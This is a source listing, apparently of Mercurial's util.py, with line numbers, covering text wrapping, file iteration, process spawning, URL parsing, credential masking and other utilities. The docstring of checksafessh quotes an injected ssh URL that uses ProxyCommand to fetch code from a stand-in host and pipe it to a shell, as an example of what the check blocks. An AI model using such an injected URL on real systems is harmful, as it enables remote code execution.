2476 2505 raise ValueError("invalid width %r (must be > 0)" % self.width)
2477 2506
2478 2507 # Arrange in reverse order so items can be efficiently popped
2479 2508 # from a stack of chunks.
2480 2509 chunks.reverse()
2481 2510
2482 2511 while chunks:
2483 2512
2484 2513 # Start the list of chunks that will make up the current line.
2485 2514 # cur_len is just the length of all the chunks in cur_line.
2486 2515 cur_line = []
2487 2516 cur_len = 0
2488 2517
2489 2518 # Figure out which static string will prefix this line.
2490 2519 if lines:
2491 2520 indent = self.subsequent_indent
2492 2521 else:
2493 2522 indent = self.initial_indent
2494 2523
2495 2524 # Maximum width for this line.
2496 2525 width = self.width - len(indent)
2497 2526
2498 2527 # First chunk on line is whitespace -- drop it, unless this
2499 2528 # is the very beginning of the text (i.e. no lines started yet).
2500 2529 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2501 2530 del chunks[-1]
2502 2531
2503 2532 while chunks:
2504 2533 l = colwidth(chunks[-1])
2505 2534
2506 2535 # Can at least squeeze this chunk onto the current line.
2507 2536 if cur_len + l <= width:
2508 2537 cur_line.append(chunks.pop())
2509 2538 cur_len += l
2510 2539
2511 2540 # Nope, this line is full.
2512 2541 else:
2513 2542 break
2514 2543
2515 2544 # The current line is full, and the next chunk is too big to
2516 2545 # fit on *any* line (not just this one).
2517 2546 if chunks and colwidth(chunks[-1]) > width:
2518 2547 self._handle_long_word(chunks, cur_line, cur_len, width)
2519 2548
2520 2549 # If the last chunk on this line is all whitespace, drop it.
2521 2550 if (self.drop_whitespace and
2522 2551 cur_line and cur_line[-1].strip() == r''):
2523 2552 del cur_line[-1]
2524 2553
2525 2554 # Convert current line back to a string and store it in list
2526 2555 # of all lines (return value).
2527 2556 if cur_line:
2528 2557 lines.append(indent + r''.join(cur_line))
2529 2558
2530 2559 return lines
2531 2560
2532 2561 global MBTextWrapper
2533 2562 MBTextWrapper = tw
2534 2563 return tw(**kwargs)
2535 2564
2536 2565 def wrap(line, width, initindent='', hangindent=''):
2537 2566 maxindent = max(len(hangindent), len(initindent))
2538 2567 if width <= maxindent:
2539 2568 # adjust for weird terminal size
2540 2569 width = max(78, maxindent + 1)
2541 2570 line = line.decode(pycompat.sysstr(encoding.encoding),
2542 2571 pycompat.sysstr(encoding.encodingmode))
2543 2572 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2544 2573 pycompat.sysstr(encoding.encodingmode))
2545 2574 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2546 2575 pycompat.sysstr(encoding.encodingmode))
2547 2576 wrapper = MBTextWrapper(width=width,
2548 2577 initial_indent=initindent,
2549 2578 subsequent_indent=hangindent)
2550 2579 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2551 2580
2552 2581 if (pyplatform.python_implementation() == 'CPython' and
2553 2582 sys.version_info < (3, 0)):
2554 2583 # There is an issue in CPython that some IO methods do not handle EINTR
2555 2584 # correctly. The following table shows what CPython version (and functions)
2556 2585 # are affected (buggy: has the EINTR bug, okay: otherwise):
2557 2586 #
2558 2587 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2559 2588 # --------------------------------------------------
2560 2589 # fp.__iter__ | buggy | buggy | okay
2561 2590 # fp.read* | buggy | okay [1] | okay
2562 2591 #
2563 2592 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2564 2593 #
2565 2594 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2566 2595 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2567 2596 #
2568 2597 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2569 2598 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2570 2599 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2571 2600 # fp.__iter__ but not other fp.read* methods.
2572 2601 #
2573 2602 # On modern systems like Linux, the "read" syscall cannot be interrupted
2574 2603 # when reading "fast" files like on-disk files. So the EINTR issue only
2575 2604 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2576 2605 # files approximately as "fast" files and use the fast (unsafe) code path,
2577 2606 # to minimize the performance impact.
2578 2607 if sys.version_info >= (2, 7, 4):
2579 2608 # fp.readline deals with EINTR correctly, use it as a workaround.
2580 2609 def _safeiterfile(fp):
2581 2610 return iter(fp.readline, '')
2582 2611 else:
2583 2612 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2584 2613 # note: this may block longer than necessary because of bufsize.
2585 2614 def _safeiterfile(fp, bufsize=4096):
2586 2615 fd = fp.fileno()
2587 2616 line = ''
2588 2617 while True:
2589 2618 try:
2590 2619 buf = os.read(fd, bufsize)
2591 2620 except OSError as ex:
2592 2621 # os.read only raises EINTR before any data is read
2593 2622 if ex.errno == errno.EINTR:
2594 2623 continue
2595 2624 else:
2596 2625 raise
2597 2626 line += buf
2598 2627 if '\n' in buf:
2599 2628 splitted = line.splitlines(True)
2600 2629 line = ''
2601 2630 for l in splitted:
2602 2631 if l[-1] == '\n':
2603 2632 yield l
2604 2633 else:
2605 2634 line = l
2606 2635 if not buf:
2607 2636 break
2608 2637 if line:
2609 2638 yield line
2610 2639
2611 2640 def iterfile(fp):
2612 2641 fastpath = True
2613 2642 if type(fp) is file:
2614 2643 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2615 2644 if fastpath:
2616 2645 return fp
2617 2646 else:
2618 2647 return _safeiterfile(fp)
2619 2648 else:
2620 2649 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2621 2650 def iterfile(fp):
2622 2651 return fp
2623 2652
2624 2653 def iterlines(iterator):
2625 2654 for chunk in iterator:
2626 2655 for line in chunk.splitlines():
2627 2656 yield line
2628 2657
2629 2658 def expandpath(path):
2630 2659 return os.path.expanduser(os.path.expandvars(path))
2631 2660
2632 2661 def hgcmd():
2633 2662 """Return the command used to execute current hg
2634 2663
2635 2664 This is different from hgexecutable() because on Windows we want
2636 2665 to avoid things like batch files that open new shell windows, so we
2637 2666 return either the python call or the current executable.
2638 2667 """
2639 2668 if mainfrozen():
2640 2669 if getattr(sys, 'frozen', None) == 'macosx_app':
2641 2670 # Env variable set by py2app
2642 2671 return [encoding.environ['EXECUTABLEPATH']]
2643 2672 else:
2644 2673 return [pycompat.sysexecutable]
2645 2674 return gethgcmd()
2646 2675
2647 2676 def rundetached(args, condfn):
2648 2677 """Execute the argument list in a detached process.
2649 2678
2650 2679 condfn is a callable which is called repeatedly and should return
2651 2680 True once the child process is known to have started successfully.
2652 2681 At this point, the child process PID is returned. If the child
2653 2682 process fails to start or finishes before condfn() evaluates to
2654 2683 True, return -1.
2655 2684 """
2656 2685 # Windows case is easier because the child process is either
2657 2686 # successfully starting and validating the condition or exiting
2658 2687 # on failure. We just poll on its PID. On Unix, if the child
2659 2688 # process fails to start, it will be left in a zombie state until
2660 2689 # the parent waits on it, which we cannot do since we expect a
2661 2690 # long-running process on success. Instead we listen for SIGCHLD telling
2662 2691 # us our child process terminated.
2663 2692 terminated = set()
2664 2693 def handler(signum, frame):
2665 2694 terminated.add(os.wait())
2666 2695 prevhandler = None
2667 2696 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2668 2697 if SIGCHLD is not None:
2669 2698 prevhandler = signal.signal(SIGCHLD, handler)
2670 2699 try:
2671 2700 pid = spawndetached(args)
2672 2701 while not condfn():
2673 2702 if ((pid in terminated or not testpid(pid))
2674 2703 and not condfn()):
2675 2704 return -1
2676 2705 time.sleep(0.1)
2677 2706 return pid
2678 2707 finally:
2679 2708 if prevhandler is not None:
2680 2709 signal.signal(signal.SIGCHLD, prevhandler)
2681 2710
2682 2711 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2683 2712 """Return the result of interpolating items in the mapping into string s.
2684 2713
2685 2714 prefix is a single character string, or a two character string with
2686 2715 a backslash as the first character if the prefix needs to be escaped in
2687 2716 a regular expression.
2688 2717
2689 2718 fn is an optional function that will be applied to the replacement text
2690 2719 just before replacement.
2691 2720
2692 2721 escape_prefix is an optional flag that allows using doubled prefix for
2693 2722 its escaping.
2694 2723 """
2695 2724 fn = fn or (lambda s: s)
2696 2725 patterns = '|'.join(mapping.keys())
2697 2726 if escape_prefix:
2698 2727 patterns += '|' + prefix
2699 2728 if len(prefix) > 1:
2700 2729 prefix_char = prefix[1:]
2701 2730 else:
2702 2731 prefix_char = prefix
2703 2732 mapping[prefix_char] = prefix_char
2704 2733 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2705 2734 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2706 2735
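# Hypothetical example of interpolate(): expand '%'-prefixed keys from a
# mapping inside a template string.
def _interpolatedemo():
    mapping = {'a': 'apple', 'b': 'banana'}
    # returns 'apple and banana'
    return interpolate('%', mapping, '%a and %b')
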
2707 2736 def getport(port):
2708 2737 """Return the port for a given network service.
2709 2738
2710 2739 If port is an integer, it's returned as is. If it's a string, it's
2711 2740 looked up using socket.getservbyname(). If there's no matching
2712 2741 service, error.Abort is raised.
2713 2742 """
2714 2743 try:
2715 2744 return int(port)
2716 2745 except ValueError:
2717 2746 pass
2718 2747
2719 2748 try:
2720 2749 return socket.getservbyname(pycompat.sysstr(port))
2721 2750 except socket.error:
2722 2751 raise Abort(_("no port number associated with service '%s'") % port)
2723 2752
2724 2753 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2725 2754 '0': False, 'no': False, 'false': False, 'off': False,
2726 2755 'never': False}
2727 2756
2728 2757 def parsebool(s):
2729 2758 """Parse s into a boolean.
2730 2759
2731 2760 If s is not a valid boolean, returns None.
2732 2761 """
2733 2762 return _booleans.get(s.lower(), None)
2734 2763
2735 2764 _hextochr = dict((a + b, chr(int(a + b, 16)))
2736 2765 for a in string.hexdigits for b in string.hexdigits)
2737 2766
2738 2767 class url(object):
2739 2768 r"""Reliable URL parser.
2740 2769
2741 2770 This parses URLs and provides attributes for the following
2742 2771 components:
2743 2772
2744 2773 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2745 2774
2746 2775 Missing components are set to None. The only exception is
2747 2776 fragment, which is set to '' if present but empty.
2748 2777
2749 2778 If parsefragment is False, fragment is included in query. If
2750 2779 parsequery is False, query is included in path. If both are
2751 2780 False, both fragment and query are included in path.
2752 2781
2753 2782 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2754 2783
2755 2784 Note that for backward compatibility reasons, bundle URLs do not
2756 2785 take host names. That means 'bundle://../' has a path of '../'.
2757 2786
2758 2787 Examples:
2759 2788
2760 2789 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2761 2790 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2762 2791 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2763 2792 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2764 2793 >>> url(b'file:///home/joe/repo')
2765 2794 <url scheme: 'file', path: '/home/joe/repo'>
2766 2795 >>> url(b'file:///c:/temp/foo/')
2767 2796 <url scheme: 'file', path: 'c:/temp/foo/'>
2768 2797 >>> url(b'bundle:foo')
2769 2798 <url scheme: 'bundle', path: 'foo'>
2770 2799 >>> url(b'bundle://../foo')
2771 2800 <url scheme: 'bundle', path: '../foo'>
2772 2801 >>> url(br'c:\foo\bar')
2773 2802 <url path: 'c:\\foo\\bar'>
2774 2803 >>> url(br'\\blah\blah\blah')
2775 2804 <url path: '\\\\blah\\blah\\blah'>
2776 2805 >>> url(br'\\blah\blah\blah#baz')
2777 2806 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2778 2807 >>> url(br'file:///C:\users\me')
2779 2808 <url scheme: 'file', path: 'C:\\users\\me'>
2780 2809
2781 2810 Authentication credentials:
2782 2811
2783 2812 >>> url(b'ssh://joe:xyz@x/repo')
2784 2813 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2785 2814 >>> url(b'ssh://joe@x/repo')
2786 2815 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2787 2816
2788 2817 Query strings and fragments:
2789 2818
2790 2819 >>> url(b'http://host/a?b#c')
2791 2820 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2792 2821 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2793 2822 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2794 2823
2795 2824 Empty path:
2796 2825
2797 2826 >>> url(b'')
2798 2827 <url path: ''>
2799 2828 >>> url(b'#a')
2800 2829 <url path: '', fragment: 'a'>
2801 2830 >>> url(b'http://host/')
2802 2831 <url scheme: 'http', host: 'host', path: ''>
2803 2832 >>> url(b'http://host/#a')
2804 2833 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2805 2834
2806 2835 Only scheme:
2807 2836
2808 2837 >>> url(b'http:')
2809 2838 <url scheme: 'http'>
2810 2839 """
2811 2840
2812 2841 _safechars = "!~*'()+"
2813 2842 _safepchars = "/!~*'()+:\\"
2814 2843 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2815 2844
2816 2845 def __init__(self, path, parsequery=True, parsefragment=True):
2817 2846 # We slowly chomp away at path until we have only the path left
2818 2847 self.scheme = self.user = self.passwd = self.host = None
2819 2848 self.port = self.path = self.query = self.fragment = None
2820 2849 self._localpath = True
2821 2850 self._hostport = ''
2822 2851 self._origpath = path
2823 2852
2824 2853 if parsefragment and '#' in path:
2825 2854 path, self.fragment = path.split('#', 1)
2826 2855
2827 2856 # special case for Windows drive letters and UNC paths
2828 2857 if hasdriveletter(path) or path.startswith('\\\\'):
2829 2858 self.path = path
2830 2859 return
2831 2860
2832 2861 # For compatibility reasons, we can't handle bundle paths as
2833 2862 # normal URLs
2834 2863 if path.startswith('bundle:'):
2835 2864 self.scheme = 'bundle'
2836 2865 path = path[7:]
2837 2866 if path.startswith('//'):
2838 2867 path = path[2:]
2839 2868 self.path = path
2840 2869 return
2841 2870
2842 2871 if self._matchscheme(path):
2843 2872 parts = path.split(':', 1)
2844 2873 if parts[0]:
2845 2874 self.scheme, path = parts
2846 2875 self._localpath = False
2847 2876
2848 2877 if not path:
2849 2878 path = None
2850 2879 if self._localpath:
2851 2880 self.path = ''
2852 2881 return
2853 2882 else:
2854 2883 if self._localpath:
2855 2884 self.path = path
2856 2885 return
2857 2886
2858 2887 if parsequery and '?' in path:
2859 2888 path, self.query = path.split('?', 1)
2860 2889 if not path:
2861 2890 path = None
2862 2891 if not self.query:
2863 2892 self.query = None
2864 2893
2865 2894 # // is required to specify a host/authority
2866 2895 if path and path.startswith('//'):
2867 2896 parts = path[2:].split('/', 1)
2868 2897 if len(parts) > 1:
2869 2898 self.host, path = parts
2870 2899 else:
2871 2900 self.host = parts[0]
2872 2901 path = None
2873 2902 if not self.host:
2874 2903 self.host = None
2875 2904 # path of file:///d is /d
2876 2905 # path of file:///d:/ is d:/, not /d:/
2877 2906 if path and not hasdriveletter(path):
2878 2907 path = '/' + path
2879 2908
2880 2909 if self.host and '@' in self.host:
2881 2910 self.user, self.host = self.host.rsplit('@', 1)
2882 2911 if ':' in self.user:
2883 2912 self.user, self.passwd = self.user.split(':', 1)
2884 2913 if not self.host:
2885 2914 self.host = None
2886 2915
2887 2916 # Don't split on colons in IPv6 addresses without ports
2888 2917 if (self.host and ':' in self.host and
2889 2918 not (self.host.startswith('[') and self.host.endswith(']'))):
2890 2919 self._hostport = self.host
2891 2920 self.host, self.port = self.host.rsplit(':', 1)
2892 2921 if not self.host:
2893 2922 self.host = None
2894 2923
2895 2924 if (self.host and self.scheme == 'file' and
2896 2925 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2897 2926 raise Abort(_('file:// URLs can only refer to localhost'))
2898 2927
2899 2928 self.path = path
2900 2929
2901 2930 # leave the query string escaped
2902 2931 for a in ('user', 'passwd', 'host', 'port',
2903 2932 'path', 'fragment'):
2904 2933 v = getattr(self, a)
2905 2934 if v is not None:
2906 2935 setattr(self, a, urlreq.unquote(v))
2907 2936
2908 2937 @encoding.strmethod
2909 2938 def __repr__(self):
2910 2939 attrs = []
2911 2940 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2912 2941 'query', 'fragment'):
2913 2942 v = getattr(self, a)
2914 2943 if v is not None:
2915 2944 attrs.append('%s: %r' % (a, v))
2916 2945 return '<url %s>' % ', '.join(attrs)
2917 2946
2918 2947 def __bytes__(self):
2919 2948 r"""Join the URL's components back into a URL string.
2920 2949
2921 2950 Examples:
2922 2951
2923 2952 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2924 2953 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2925 2954 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2926 2955 'http://user:pw@host:80/?foo=bar&baz=42'
2927 2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2928 2957 'http://user:pw@host:80/?foo=bar%3dbaz'
2929 2958 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2930 2959 'ssh://user:pw@[::1]:2200//home/joe#'
2931 2960 >>> bytes(url(b'http://localhost:80//'))
2932 2961 'http://localhost:80//'
2933 2962 >>> bytes(url(b'http://localhost:80/'))
2934 2963 'http://localhost:80/'
2935 2964 >>> bytes(url(b'http://localhost:80'))
2936 2965 'http://localhost:80/'
2937 2966 >>> bytes(url(b'bundle:foo'))
2938 2967 'bundle:foo'
2939 2968 >>> bytes(url(b'bundle://../foo'))
2940 2969 'bundle:../foo'
2941 2970 >>> bytes(url(b'path'))
2942 2971 'path'
2943 2972 >>> bytes(url(b'file:///tmp/foo/bar'))
2944 2973 'file:///tmp/foo/bar'
2945 2974 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2946 2975 'file:///c:/tmp/foo/bar'
2947 2976 >>> print(url(br'bundle:foo\bar'))
2948 2977 bundle:foo\bar
2949 2978 >>> print(url(br'file:///D:\data\hg'))
2950 2979 file:///D:\data\hg
2951 2980 """
2952 2981 if self._localpath:
2953 2982 s = self.path
2954 2983 if self.scheme == 'bundle':
2955 2984 s = 'bundle:' + s
2956 2985 if self.fragment:
2957 2986 s += '#' + self.fragment
2958 2987 return s
2959 2988
2960 2989 s = self.scheme + ':'
2961 2990 if self.user or self.passwd or self.host:
2962 2991 s += '//'
2963 2992 elif self.scheme and (not self.path or self.path.startswith('/')
2964 2993 or hasdriveletter(self.path)):
2965 2994 s += '//'
2966 2995 if hasdriveletter(self.path):
2967 2996 s += '/'
2968 2997 if self.user:
2969 2998 s += urlreq.quote(self.user, safe=self._safechars)
2970 2999 if self.passwd:
2971 3000 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2972 3001 if self.user or self.passwd:
2973 3002 s += '@'
2974 3003 if self.host:
2975 3004 if not (self.host.startswith('[') and self.host.endswith(']')):
2976 3005 s += urlreq.quote(self.host)
2977 3006 else:
2978 3007 s += self.host
2979 3008 if self.port:
2980 3009 s += ':' + urlreq.quote(self.port)
2981 3010 if self.host:
2982 3011 s += '/'
2983 3012 if self.path:
2984 3013 # TODO: similar to the query string, we should not unescape the
2985 3014 # path when we store it, the path might contain '%2f' = '/',
2986 3015 # which we should *not* escape.
2987 3016 s += urlreq.quote(self.path, safe=self._safepchars)
2988 3017 if self.query:
2989 3018 # we store the query in escaped form.
2990 3019 s += '?' + self.query
2991 3020 if self.fragment is not None:
2992 3021 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2993 3022 return s
2994 3023
2995 3024 __str__ = encoding.strmethod(__bytes__)
2996 3025
2997 3026 def authinfo(self):
2998 3027 user, passwd = self.user, self.passwd
2999 3028 try:
3000 3029 self.user, self.passwd = None, None
3001 3030 s = bytes(self)
3002 3031 finally:
3003 3032 self.user, self.passwd = user, passwd
3004 3033 if not self.user:
3005 3034 return (s, None)
3006 3035 # authinfo[1] is passed to urllib2 password manager, and its
3007 3036 # URIs must not contain credentials. The host is passed in the
3008 3037 # URIs list because Python < 2.4.3 uses only that to search for
3009 3038 # a password.
3010 3039 return (s, (None, (s, self.host),
3011 3040 self.user, self.passwd or ''))
3012 3041
3013 3042 def isabs(self):
3014 3043 if self.scheme and self.scheme != 'file':
3015 3044 return True # remote URL
3016 3045 if hasdriveletter(self.path):
3017 3046 return True # absolute for our purposes - can't be joined()
3018 3047 if self.path.startswith(br'\\'):
3019 3048 return True # Windows UNC path
3020 3049 if self.path.startswith('/'):
3021 3050 return True # POSIX-style
3022 3051 return False
3023 3052
3024 3053 def localpath(self):
3025 3054 if self.scheme == 'file' or self.scheme == 'bundle':
3026 3055 path = self.path or '/'
3027 3056 # For Windows, we need to promote hosts containing drive
3028 3057 # letters to paths with drive letters.
3029 3058 if hasdriveletter(self._hostport):
3030 3059 path = self._hostport + '/' + self.path
3031 3060 elif (self.host is not None and self.path
3032 3061 and not hasdriveletter(path)):
3033 3062 path = '/' + path
3034 3063 return path
3035 3064 return self._origpath
3036 3065
3037 3066 def islocal(self):
3038 3067 '''whether localpath will return something that posixfile can open'''
3039 3068 return (not self.scheme or self.scheme == 'file'
3040 3069 or self.scheme == 'bundle')
3041 3070
3042 3071 def hasscheme(path):
3043 3072 return bool(url(path).scheme)
3044 3073
3045 3074 def hasdriveletter(path):
3046 3075 return path and path[1:2] == ':' and path[0:1].isalpha()
3047 3076
3048 3077 def urllocalpath(path):
3049 3078 return url(path, parsequery=False, parsefragment=False).localpath()
3050 3079
3051 3080 def checksafessh(path):
3052 3081 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3053 3082
3054 3083 This is a sanity check for ssh urls. ssh will parse the first item as
3055 3084 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3056 3085 Let's prevent these potentially exploitable urls entirely and warn the
3057 3086 user.
3058 3087
3059 3088 Raises an error.Abort when the url is unsafe.
3060 3089 """
3061 3090 path = urlreq.unquote(path)
3062 3091 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3063 3092 raise error.Abort(_('potentially unsafe url: %r') %
3064 3093 (path,))
3065 3094
3066 3095 def hidepassword(u):
3067 3096 '''hide user credential in a url string'''
3068 3097 u = url(u)
3069 3098 if u.passwd:
3070 3099 u.passwd = '***'
3071 3100 return bytes(u)
3072 3101
3073 3102 def removeauth(u):
3074 3103 '''remove all authentication information from a url string'''
3075 3104 u = url(u)
3076 3105 u.user = u.passwd = None
3077 3106 return bytes(u) # bytes for consistency with hidepassword()
3078 3107
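# Hedged illustration of the credential helpers above (the URL is made up):
def _hidepassworddemo():
    masked = hidepassword('http://joe:secret@example.com/repo')
    assert masked == 'http://joe:***@example.com/repo'
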
3079 3108 timecount = unitcountfn(
3080 3109 (1, 1e3, _('%.0f s')),
3081 3110 (100, 1, _('%.1f s')),
3082 3111 (10, 1, _('%.2f s')),
3083 3112 (1, 1, _('%.3f s')),
3084 3113 (100, 0.001, _('%.1f ms')),
3085 3114 (10, 0.001, _('%.2f ms')),
3086 3115 (1, 0.001, _('%.3f ms')),
3087 3116 (100, 0.000001, _('%.1f us')),
3088 3117 (10, 0.000001, _('%.2f us')),
3089 3118 (1, 0.000001, _('%.3f us')),
3090 3119 (100, 0.000000001, _('%.1f ns')),
3091 3120 (10, 0.000000001, _('%.2f ns')),
3092 3121 (1, 0.000000001, _('%.3f ns')),
3093 3122 )
3094 3123
3095 3124 _timenesting = [0]
3096 3125
3097 3126 def timed(func):
3098 3127 '''Report the execution time of a function call to stderr.
3099 3128
3100 3129 During development, use as a decorator when you need to measure
3101 3130 the cost of a function, e.g. as follows:
3102 3131
3103 3132 @util.timed
3104 3133 def foo(a, b, c):
3105 3134 pass
3106 3135 '''
3107 3136
3108 3137 def wrapper(*args, **kwargs):
3109 3138 start = timer()
3110 3139 indent = 2
3111 3140 _timenesting[0] += indent
3112 3141 try:
3113 3142 return func(*args, **kwargs)
3114 3143 finally:
3115 3144 elapsed = timer() - start
3116 3145 _timenesting[0] -= indent
3117 3146 stderr.write('%s%s: %s\n' %
3118 3147 (' ' * _timenesting[0], func.__name__,
3119 3148 timecount(elapsed)))
3120 3149 return wrapper
3121 3150
3122 3151 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3123 3152 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3124 3153
3125 3154 def sizetoint(s):
3126 3155 '''Convert a space specifier to a byte count.
3127 3156
3128 3157 >>> sizetoint(b'30')
3129 3158 30
3130 3159 >>> sizetoint(b'2.2kb')
3131 3160 2252
3132 3161 >>> sizetoint(b'6M')
3133 3162 6291456
3134 3163 '''
3135 3164 t = s.strip().lower()
3136 3165 try:
3137 3166 for k, u in _sizeunits:
3138 3167 if t.endswith(k):
3139 3168 return int(float(t[:-len(k)]) * u)
3140 3169 return int(t)
3141 3170 except ValueError:
3142 3171 raise error.ParseError(_("couldn't parse size: %s") % s)
3143 3172
3144 3173 class hooks(object):
3145 3174 '''A collection of hook functions that can be used to extend a
3146 3175 function's behavior. Hooks are called in lexicographic order,
3147 3176 based on the names of their sources.'''
3148 3177
3149 3178 def __init__(self):
3150 3179 self._hooks = []
3151 3180
3152 3181 def add(self, source, hook):
3153 3182 self._hooks.append((source, hook))
3154 3183
3155 3184 def __call__(self, *args):
3156 3185 self._hooks.sort(key=lambda x: x[0])
3157 3186 results = []
3158 3187 for source, hook in self._hooks:
3159 3188 results.append(hook(*args))
3160 3189 return results
3161 3190
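# Small sketch of the hooks helper (the source names are invented): hooks
# run sorted by source name, and all results are collected.
def _hooksdemo():
    h = hooks()
    h.add('zz-late', lambda x: x + 2)
    h.add('aa-early', lambda x: x * 2)
    return h(3)  # [6, 5]: 'aa-early' sorts before 'zz-late'
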
3162 3191 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3163 3192 '''Yields lines for a nicely formatted stacktrace.
3164 3193 Skips the last 'skip' entries, then returns the last 'depth' entries.
3165 3194 Each file+linenumber is formatted according to fileline.
3166 3195 Each line is formatted according to line.
3167 3196 If line is None, it yields:
3168 3197 length of longest filepath+line number,
3169 3198 filepath+linenumber,
3170 3199 function
3171 3200
3172 3201 Not to be used in production code, but very convenient while developing.
3173 3202 '''
3174 3203 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3175 3204 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3176 3205 ][-depth:]
3177 3206 if entries:
3178 3207 fnmax = max(len(entry[0]) for entry in entries)
3179 3208 for fnln, func in entries:
3180 3209 if line is None:
3181 3210 yield (fnmax, fnln, func)
3182 3211 else:
3183 3212 yield line % (fnmax, fnln, func)
3184 3213
3185 3214 def debugstacktrace(msg='stacktrace', skip=0,
3186 3215 f=stderr, otherf=stdout, depth=0):
3187 3216 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3188 3217 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3189 3218 By default it will flush stdout first.
3190 3219 It can be used everywhere and intentionally does not require a ui object.
3191 3220 Not to be used in production code, but very convenient while developing.
3192 3221 '''
3193 3222 if otherf:
3194 3223 otherf.flush()
3195 3224 f.write('%s at:\n' % msg.rstrip())
3196 3225 for line in getstackframes(skip + 1, depth=depth):
3197 3226 f.write(line)
3198 3227 f.flush()
3199 3228
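# Illustrative sketch, not from the original source: while debugging one
# would typically drop a call such as
#
#   debugstacktrace('who calls me?', skip=1)
#
# into a suspect code path; it prints the message followed by the
# 'file:line in function' frames leading up to the call.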
3200 3229 class dirs(object):
3201 3230 '''a multiset of directory names from a dirstate or manifest'''
3202 3231
3203 3232 def __init__(self, map, skip=None):
3204 3233 self._dirs = {}
3205 3234 addpath = self.addpath
3206 3235 if safehasattr(map, 'iteritems') and skip is not None:
3207 3236 for f, s in map.iteritems():
3208 3237 if s[0] != skip:
3209 3238 addpath(f)
3210 3239 else:
3211 3240 for f in map:
3212 3241 addpath(f)
3213 3242
3214 3243 def addpath(self, path):
3215 3244 dirs = self._dirs
3216 3245 for base in finddirs(path):
3217 3246 if base in dirs:
3218 3247 dirs[base] += 1
3219 3248 return
3220 3249 dirs[base] = 1
3221 3250
3222 3251 def delpath(self, path):
3223 3252 dirs = self._dirs
3224 3253 for base in finddirs(path):
3225 3254 if dirs[base] > 1:
3226 3255 dirs[base] -= 1
3227 3256 return
3228 3257 del dirs[base]
3229 3258
3230 3259 def __iter__(self):
3231 3260 return iter(self._dirs)
3232 3261
3233 3262 def __contains__(self, d):
3234 3263 return d in self._dirs
3235 3264
3236 3265 if safehasattr(parsers, 'dirs'):
3237 3266 dirs = parsers.dirs
3238 3267
3239 3268 def finddirs(path):
3240 3269 pos = path.rfind('/')
3241 3270 while pos != -1:
3242 3271 yield path[:pos]
3243 3272 pos = path.rfind('/', 0, pos)
3244 3273
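# Illustrative sketch, not part of the original module: finddirs yields the
# ancestor directories of a path, deepest first, and dirs counts tracked
# files per directory (the C implementation behaves the same way):
#
#   >>> list(finddirs('a/b/c'))
#   ['a/b', 'a']
#   >>> d = dirs(['a/b/c', 'a/d'])
#   >>> sorted(d)
#   ['a', 'a/b']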
3245 3274 # compression code
3246 3275
3247 3276 SERVERROLE = 'server'
3248 3277 CLIENTROLE = 'client'
3249 3278
3250 3279 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3251 3280 (u'name', u'serverpriority',
3252 3281 u'clientpriority'))
3253 3282
3254 3283 class compressormanager(object):
3255 3284 """Holds registrations of various compression engines.
3256 3285
3257 3286 This class essentially abstracts the differences between compression
3258 3287 engines to allow new compression formats to be added easily, possibly from
3259 3288 extensions.
3260 3289
3261 3290 Compressors are registered against the global instance by calling its
3262 3291 ``register()`` method.
3263 3292 """
3264 3293 def __init__(self):
3265 3294 self._engines = {}
